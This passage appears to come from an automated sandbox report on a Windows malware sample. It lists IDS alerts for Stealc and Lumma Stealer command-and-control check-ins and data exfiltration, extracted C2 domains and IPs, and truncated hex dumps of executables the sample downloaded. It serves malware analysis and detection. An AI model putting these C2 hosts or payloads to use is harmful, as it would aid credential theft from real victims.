Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50041 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:58411 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50074 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:65037 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:56822 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:51774 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50111 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49714 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49710 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49740 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49755 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49901 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50068 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50068 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50058 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50067 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50067 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49993 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50072 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50080 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50083 -> 172.67.206.204:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:20 GMTContent-Type: application/octet-streamContent-Length: 1925632Last-Modified: Wed, 23 Oct 2024 15:37:20 GMTConnection: keep-aliveETag: "67191830-1d6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 5c be 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 37 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 36 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6f 69 6f 79 7a 67 74 00 50 1a 00 00 f0 31 00 00 48 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 61 63 6a 64 71 69 75 00 10 00 00 00 40 4c 00 00 04 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:26 GMTContent-Type: application/octet-streamContent-Length: 1833984Last-Modified: Wed, 23 Oct 2024 15:37:13 GMTConnection: keep-aliveETag: "67191829-1bfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 d1 e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 61 64 67 76 74 6a 71 00 a0 19 00 00 a0 4f 00 00 9a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 76 71 6a 6f 71 6d 00 10 00 00 00 40 69 00 00 04 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:28 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Wed, 23 Oct 2024 15:44:06 GMTConnection: keep-aliveETag: "671919c6-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 de 72 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7a 73 64 6a 77 61 6c 69 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 72 6e 6d 63 78 63 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:39 GMTContent-Type: application/octet-streamContent-Length: 2891264Last-Modified: Wed, 23 Oct 2024 15:37:07 GMTConnection: keep-aliveETag: "67191823-2c1e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 a0 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 2f 00 00 04 00 00 dc 94 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 75 6f 78 6e 62 72 6e 00 90 29 00 00 00 06 00 00 86 29 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6b 6b 71 68 65 74 77 00 10 00 00 00 90 2f 00 00 06 00 00 00 f6 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 2f 00 00 22 00 00 00 fc 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:45 GMTContent-Type: application/octet-streamContent-Length: 1833984Last-Modified: Wed, 23 Oct 2024 15:37:13 GMTConnection: keep-aliveETag: "67191829-1bfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 d1 e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 61 64 67 76 74 6a 71 00 a0 19 00 00 a0 4f 00 00 9a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 76 71 6a 6f 71 6d 00 10 00 00 00 40 69 00 00 04 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:51 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 23 Oct 2024 15:43:38 GMTConnection: keep-aliveETag: "671919aa-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a2 19 19 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 7e 75 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
